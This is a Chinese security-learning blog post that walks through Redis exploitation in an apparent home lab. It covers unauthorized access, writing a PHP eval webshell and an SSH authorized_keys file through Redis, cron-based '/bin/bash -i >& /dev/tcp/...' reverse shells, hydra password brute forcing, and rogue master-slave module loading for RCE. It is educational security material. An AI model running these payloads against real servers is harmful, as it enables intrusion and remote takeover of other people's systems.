<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="Redis, marin的小窝">
    <meta name="description" content="RedisRedis 基础Redis 全称 Remote Dictionary Server，是一个开源的，基于内存的键值对数据库
Redis 的数据是存储在内存中的，读写速度非常快，但是一旦掉电或进程崩溃，非持久化的数据会丢失
主从同步这">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>Redis | marin的小窝</title>
    <link rel="icon" type="image/jpeg" href="/favicon.jpg">
    


    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    
        <link rel="stylesheet" type="text/css" href="/css/reward.css">
    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 8.1.1"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">marin的小窝</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>主页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>类型</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于我</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友链</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">marin的小窝</div>
        <div class="logo-desc">
            
            一个学习网安的小菜鸡
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			主页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			类型
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于我
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友链
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/c3170526bdf37df281b1180d3a76367f.png')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">Redis</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/web/">
                                <span class="chip bg-color">web</span>
                            </a>
                        
                            <a href="/tags/%E6%BC%8F%E6%B4%9E/">
                                <span class="chip bg-color">漏洞</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/WEB/" class="post-category">
                                WEB
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2025-12-08
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="Redis"><a href="#Redis" class="headerlink" title="Redis"></a>Redis</h1><h2 id="Redis-基础"><a href="#Redis-基础" class="headerlink" title="Redis 基础"></a>Redis 基础</h2><p>Redis 全称 <code>Remote Dictionary Server</code>，是一个开源的，基于内存的键值对数据库</p>
<p>Redis 的数据是存储在内存中的，读写速度非常快，但是一旦掉电或进程崩溃，非持久化的数据会丢失</p>
<h3 id="主从同步"><a href="#主从同步" class="headerlink" title="主从同步"></a>主从同步</h3><p>这是 Redis <code>4.x</code>​ 和 <code>5.x</code> 版本中一个关键的特性</p>
<ul>
<li><p>单层树复制</p>
<p>在 Redis 中，有主服务器，负责所有的写操作，从服务器，只能进行读操作，从服务器可以作为中继站连接更多的从服务器</p>
</li>
<li><p>持久化</p>
<p>当从服务器为了同步数据进行全量复制时，会将主服务器发来的数据存储到磁盘，然后再加载进内存</p>
<p>这里如果主服务器的数据是恶意的，有可能将内存中给的恶意数据写到系统关键位置，或者覆盖原本的重要文件</p>
</li>
<li><p>发布与订阅</p>
<p>Redis 不仅是一个数据库，还是一个消息队列，主服务器上的数据变动，都会通过一个特殊的频道广播给从服务器，如果从服务器订阅了这个频道，就能实时拿到日志</p>
<p>如果网络没有加密，可以在内网获取到流量，得到写入数据库的数据</p>
</li>
</ul>
<p>‍</p>
<h3 id="核心配置"><a href="#核心配置" class="headerlink" title="核心配置"></a>核心配置</h3><p>Redis 的核心配置文件是 <code>redis.conf</code></p>
<table>
<thead>
<tr>
<th>配置项</th>
<th>意义</th>
</tr>
</thead>
<tbody><tr>
<td>​<code>bind $IP</code></td>
<td>绑定 IP 地址，允许绑定多个 IP，如果设置为 <code>0.0.0.0</code> 则全网可以访问</td>
</tr>
<tr>
<td>​<code>port $6379</code></td>
<td>配置端口号，默认端口是 6379</td>
</tr>
<tr>
<td>​<code>requirepass $passwd</code></td>
<td>后面加密码，这个是客户端连接 redis 服务器时使用的密码，默认是空的，没有密码即可连接<br /></td>
</tr>
<tr>
<td>​<code>dir $path</code></td>
<td>配置工作目录，redis 产生的备份文件都放在这里</td>
</tr>
<tr>
<td>​<code>dbfilename $name</code></td>
<td>指定备份文件的名字，默认是 <code>dump.rdb</code></td>
</tr>
<tr>
<td>​<code>protected-mode</code></td>
<td>默认为开启，开启之后禁止外部连接</td>
</tr>
</tbody></table>
<p>‍</p>
<h3 id="Redis-安装"><a href="#Redis-安装" class="headerlink" title="Redis 安装"></a>Redis 安装</h3><ol>
<li><p><code>redis-3.2.0</code></p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">wget http:&#x2F;&#x2F;download.redis.io&#x2F;releases&#x2F;redis-3.2.0.tar.gz
tar xzf redis-3.2.0.tar.gz
cd redis-3.2.0
make   #编译安装

sudo cp redis-cli &#x2F;usr&#x2F;bin
sudo cp redis-server &#x2F;usr&#x2F;bin</code></pre></li>
<li><p><code>Redis-4.0.8</code></p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">wget http:&#x2F;&#x2F;download.redis.io&#x2F;releases&#x2F;redis-4.0.8.tar.gz
tar xvf redis-4.0.8.tar.gz
cd redis-4.0.8
make</code></pre></li>
</ol>
<p>‍</p>
<p><code>192.168.154.130</code></p>
<h2 id="Redis-漏洞"><a href="#Redis-漏洞" class="headerlink" title="Redis 漏洞"></a>Redis 漏洞</h2><h3 id="Redis-未授权访问"><a href="#Redis-未授权访问" class="headerlink" title="Redis 未授权访问"></a>Redis 未授权访问</h3><blockquote>
<p>漏洞利用条件</p>
<ul>
<li>服务关闭了 <code>protected-mode</code></li>
<li>服务不设置密码</li>
<li>服务对公网开放</li>
</ul>
</blockquote>
<p>修改配置中的模式和 ip 绑定，这里注释掉或者修改为 <code>0.0.0.0</code> 都可以</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303132020-qog9yyh.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303131644-ejk7qml.png" alt="image"></p>
<p>然后启动 redis</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">redis-server redis.conf</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303132352-26vbp39.png" alt="image"></p>
<p>使用另一个访问</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">redis-cli -h 192.168.154.130</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303132548-vzavp62.png" alt="image"></p>
<p>‍</p>
<h3 id="Redis-写入-webshell"><a href="#Redis-写入-webshell" class="headerlink" title="Redis 写入 webshell"></a>Redis 写入 webshell</h3><blockquote>
<p>漏洞利用条件</p>
<ul>
<li>以高权限启动 Redis 服务</li>
<li>Redis 有未授权访问</li>
<li>需要有 web 端服务，并且知道服务的默认路径</li>
</ul>
</blockquote>
<p>先在目标服务器启动一个 web 服务</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">&#x2F;etc&#x2F;init.d&#x2F;apache2 start</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303145731-51hzxow.png" alt="image"></p>
<p>然后启动 redis 服务，这里要用 root 用户启动，否则没有写入权限，在保存这一步会失败</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303152238-xwzh71c.png" alt="image"></p>
<p>攻击者连接 redis 服务，将恶意代码写入 web 服务器</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">&#x2F;&#x2F; 设置路径
config set dir &#x2F;var&#x2F;www&#x2F;html 
&#x2F;&#x2F; 设置写入文件名
config set dbfilename cmd.php
&#x2F;&#x2F; 设置写入恶意代码，因为 redis 写文件时，会加入很多二进制信息，这里的换行符就是为了让 php 能够被解析
&#x2F;&#x2F; 这里的 xxx 是一个键名，因为 redis 是一个键值对数据库
set xxx &quot;\n\n\n&lt;?php @eval($_POST[&#39;cmd&#39;]);?&gt;\n\n\n&quot;
&#x2F;&#x2F; 这里会将内存中的键值对提取出来，安装指定格式写入磁盘文件，也就是 dbfilename 中
save</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303151306-gsrdqfu.png" alt="image"></p>
<p>在 web 端就可以实现</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303151442-u6nklt7.png" alt="image"></p>
<p>‍</p>
<h3 id="Redis-密钥登录-ssh"><a href="#Redis-密钥登录-ssh" class="headerlink" title="Redis 密钥登录 ssh"></a>Redis 密钥登录 ssh</h3><blockquote>
<p>漏洞利用条件</p>
<ul>
<li>Redis 有未授权访问</li>
<li>以高权限启动 Redis 服务</li>
<li>服务器启动了 ssh 服务</li>
</ul>
</blockquote>
<p>启动 ssh 服务</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303153139-vzlyl5m.png" alt="image"></p>
<p>在攻击者处创建 <code>ssh-rsa</code> 密钥，这里的全部都不填，一直回车就行</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">ssh-keygen -t rsa</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303153335-lb3jy3k.png" alt="image"></p>
<p>然后将这个公钥导入到一个文件中，这里加入换行符防止乱码</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303153537-kg3zqjq.png" alt="image"></p>
<p>将生成的公钥写入到目标服务器的内容中</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">&#x2F;&#x2F; -x 表示从标准输入读取数据作为这个命令的最后一个参数，也就是键值对的值
cat key.txt | redis-cli -h 192.168.154.130 -x set xxx</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303154000-qnppn4i.png" alt="image"></p>
<p>成功读取到这个数据</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303154215-xzrhyk4.png" alt="image"></p>
<p>然后还是设置路径和文件名</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">config set dir &#x2F;root&#x2F;.ssh
config set dbfilename authorized_keys
save</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303154538-uwrunnh.png" alt="image"></p>
<p>目标服务器也成功写入了</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303154634-211tp7g.png" alt="image"></p>
<p>在攻击者这边使用 ssh 连接，发现成功了，无需密码登录</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">ssh -i id_rsa root@192.168.154.130</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303154718-urbv2ip.png" alt="image"></p>
<p>‍</p>
<h3 id="利用定时计划任务反弹-shell"><a href="#利用定时计划任务反弹-shell" class="headerlink" title="利用定时计划任务反弹 shell"></a>利用定时计划任务反弹 shell</h3><blockquote>
<p>漏洞利用条件</p>
<ul>
<li>Redis 有未授权访问</li>
<li>以高权限启动 Redis 服务</li>
<li>需要目标服务器的 linux 发行版支持</li>
</ul>
</blockquote>
<p>这里不同的 linux 发行版对定时任务的路径、文件名等都不同</p>
<table>
<thead>
<tr>
<th>操作系统类型</th>
<th>Cron 路径</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>​<code>CentOS / RHEL</code></td>
<td>​<code>/var/spool/cron/</code></td>
<td>写入的是 root 文件，对文件格式比较宽松</td>
</tr>
<tr>
<td>​<code>Ubuntu / Debian</code></td>
<td>​<code>/var/spool/cron/crontabs/</code></td>
<td>这里也是写入 root 文件</td>
</tr>
<tr>
<td>通用系统级路径</td>
<td>​<code>/etc/crontab</code></td>
<td>所有的 linux 系统都有这个文件，但是这里的格式有点不同</td>
</tr>
<tr>
<td>通用目录级路径</td>
<td>​<code>/etc/cron.d/</code></td>
<td>这里可以随意命名文件 <code>/etc/cron.d/shell</code>，系统自动加载</td>
</tr>
</tbody></table>
<p>这里先看看我的目标机的发行版</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">cat &#x2F;etc&#x2F;os-release</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303160059-zxwoae7.png" alt="image"></p>
<p>我这里都是使用的 Ubuntu，这个发行版好像无法成功执行这个漏洞，因为 Redis 写入的文件默认权限是 644，而现代的 cron 强制要求 600，所以无法执行<br>而且 RDB 文件写入的二进制会破坏定时任务的解析</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">sudo tail -f &#x2F;var&#x2F;log&#x2F;syslog | grep cron</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260303161244-9w3asba.png" alt="image"></p>
<p>这里测试了两个地方写计划任务都失败了，可能 centos 成功率高一点</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">config set dir &#x2F;etc&#x2F;cron.d&#x2F;
config set dbfilename shell
set xxx &quot;\n\n\n* * * * * root &#x2F;bin&#x2F;bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;172.19.132.154&#x2F;1234 0&gt;&amp;1\n\n\n&quot;
save

config set dir &#x2F;var&#x2F;spool&#x2F;cron&#x2F;crontabs
config set dbfilename root
set xxx &quot;\n\n\n* * * * * root &#x2F;bin&#x2F;bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;172.19.132.154&#x2F;1234 0&gt;&amp;1\n\n\n&quot;
save

&#x2F;&#x2F; centos
config set dir &#x2F;var&#x2F;spool&#x2F;cron&#x2F;
config set dbfilename root
set xxx &quot;\n\n\n* * * * * root &#x2F;bin&#x2F;bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;172.19.132.154&#x2F;1234 0&gt;&amp;1\n\n\n&quot;
save</code></pre>

<p>‍</p>
<h3 id="密码爆破"><a href="#密码爆破" class="headerlink" title="密码爆破"></a>密码爆破</h3><p>这个如果 Redis 配置了密码，那就没有未授权访问那么方便了，需要进行密码的爆破</p>
<p>判断一个服务有没有密码，连接后执行命令就会返回这个</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260304150031-upnm902.png" alt="image"></p>
<p>在 <code>redis-cli</code> 中有两种认证的方式</p>
<ol>
<li><p>使用 <code>AUTH</code> 认证</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260304150152-f9j0ej6.png" alt="image"></p>
</li>
<li><p>连接时直接指定密码</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260304150217-3undw33.png" alt="image"></p>
</li>
</ol>
<p>如果不知道密码，就可以爆破，可以使用 hydra 工具，Redis 没有用户名，所以只要指定密码就行</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">hydra -P passwd.txt redis:&#x2F;&#x2F;192.168.154.130</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260304150359-1bhku4k.png" alt="image"></p>
<p>‍</p>
<h3 id="远程主从同步-RCE"><a href="#远程主从同步-RCE" class="headerlink" title="远程主从同步 RCE"></a>远程主从同步 RCE</h3><blockquote>
<p>漏洞利用条件</p>
<ul>
<li>Redis 公网可以访问</li>
<li>Redis 版本高于 <code>4.x</code></li>
</ul>
</blockquote>
<p>这个利用的就是主从同步这个特性，并且 Redis 在 <code>4.x</code>​ 以后，加入了一个新的 <code>module</code>​ 功能，允许用户加载自己编写的 <code>.so</code> 文件来拓展 Redis 的指令</p>
<p>这里利用了一个工具 <a target="_blank" rel="noopener" href="https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server?tab=readme-ov-file">Testzero-wz&#x2F;Awsome-Redis-Rogue-Server: Redis-Rogue-Server Implement</a></p>
<p>这个工具的原理是这样的，攻击者先连接上这个 Redis 服务，然后通过未授权执行主从复制命令，让目标服务器将攻击者作为主服务器，然后攻击者向目标提供恶意的 <code>exp.so</code> 文件，然后攻击者就可以利用这个执行命令了</p>
<blockquote>
<p>这个工具需要编译 c 成一个 <code>so</code> 文件，这里我在编译的时候会失败，问出来是少了两句</p>
<pre class="line-numbers language-c" data-language="c" data-start="1"><code class="language-c">#include &lt;string.h&gt;    &#x2F;&#x2F; 修复 strlen, strcat, memset, strcpy
#include &lt;arpa&#x2F;inet.h&gt;  &#x2F;&#x2F; 修复 inet_addr, htons</code></pre></blockquote>
<p>首先在目标机器打开一个 Redis 服务，然后攻击者执行这个脚本</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">python redis_rogue_server.py -rhost 192.168.154.130 -lhost 172.19.132.154</code></pre>

<p>这里我没有用高权限打开 Redis 服务，所以只能进入 tmp 目录</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260304145032-8cfi69d.png" alt="image"></p>
<p>这里成功加载了 <code>.so</code>​ 文件，这里最后可以选择模式，<code>i</code>​ 就是交互式的 shell，直接在这里执行命令，<code>r</code> 就是反弹 shell</p>
<p>下面是反弹 shell 模式下</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260304145310-qjj2o9y.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260304145328-gacaluu.png" alt="image"></p>
<ul>
<li><p>这个工具也可以在目标有密码的时候使用，指定密码就哭呀，会自动发送一个 AUTH 包判断的</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">python redis_rogue_server.py -rhost 192.168.154.130 -lhost 172.19.132.154 -passwd admin</code></pre></li>
</ul>
<h3 id="本地主从同步-RCE"><a href="#本地主从同步-RCE" class="headerlink" title="本地主从同步 RCE"></a>本地主从同步 RCE</h3><p>前面执行的操作都是在公网可以访问这个 Redis 服务的情况下，如果这个服务只能在本地访问呢，我们如果可以通过类似 ssrf 或者其他漏洞进到本地，需要进行反弹 shell，就可以利用这个漏洞</p>
<p>先修改配置，只能本地访问</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260304152058-fe5vhwb.png" alt="image"></p>
<p>然后启动服务，在本地打开登录 Redis</p>
<p>攻击者在远程主服务器开启脚本，开启端口为 15000 的主服务器</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">python redis_rogue_server.py -v -path module.so</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260304152240-al4hrnu.png" alt="image"></p>
<p>然后在目标服务器中配置，可以看到一开始是没有模块加载的</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260304152516-kgqz3gk.png" alt="image"></p>
<p>攻击者一直在同步数据</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260304153016-dlmbl8w.png" alt="image"></p>
<p>配置一下主从同步</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">&#x2F;&#x2F; 配置写入路径，tmp 目录一般都可写
config set dir &#x2F;tmp
&#x2F;&#x2F; 设置名字
config dbfilename exp.so
&#x2F;&#x2F; 进行主从同步，将恶意 so 文件写入到 tmp 目录
slaveof 172.19.132.154 15000
&#x2F;&#x2F; 加载恶意 so 文件
module load .&#x2F;exp.so</code></pre>

<p>这里已经加载了模块了</p>
<p>这个工具的 so 文件的模块有两种执行的模式</p>
<ul>
<li><code>RedisRuntime.exec</code>：直接执行命令</li>
<li><code>RedisRuntime.rev</code>：用来反弹 shell</li>
</ul>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260304163342-m46zpjw.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260304163449-2dvy0r6.png" alt="image"></p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">&#x2F;&#x2F; 解除主从同步
slaveof NO ONE</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260304163530-vbzwc91.png" alt="image"></p>
<p>‍</p>
<p>参考：</p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/289231.html">Redis漏洞总结 - FreeBuf网络安全行业门户</a></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Marin</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://wwwmarin.xyz/2025/12/08/redis/">https://wwwmarin.xyz/2025/12/08/redis/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Marin</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/web/">
                                    <span class="chip bg-color">web</span>
                                </a>
                            
                                <a href="/tags/%E6%BC%8F%E6%B4%9E/">
                                    <span class="chip bg-color">漏洞</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2025/12/08/redis/">
                    <div class="card-image">
                        
                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/c3170526bdf37df281b1180d3a76367f.png" class="responsive-img" alt="Redis">
                        
                        <span class="card-title">Redis</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2025-12-08
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/WEB/" class="post-category">
                                    WEB
                                </a>
                            
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                    <a href="/tags/%E6%BC%8F%E6%B4%9E/">
                        <span class="chip bg-color">漏洞</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
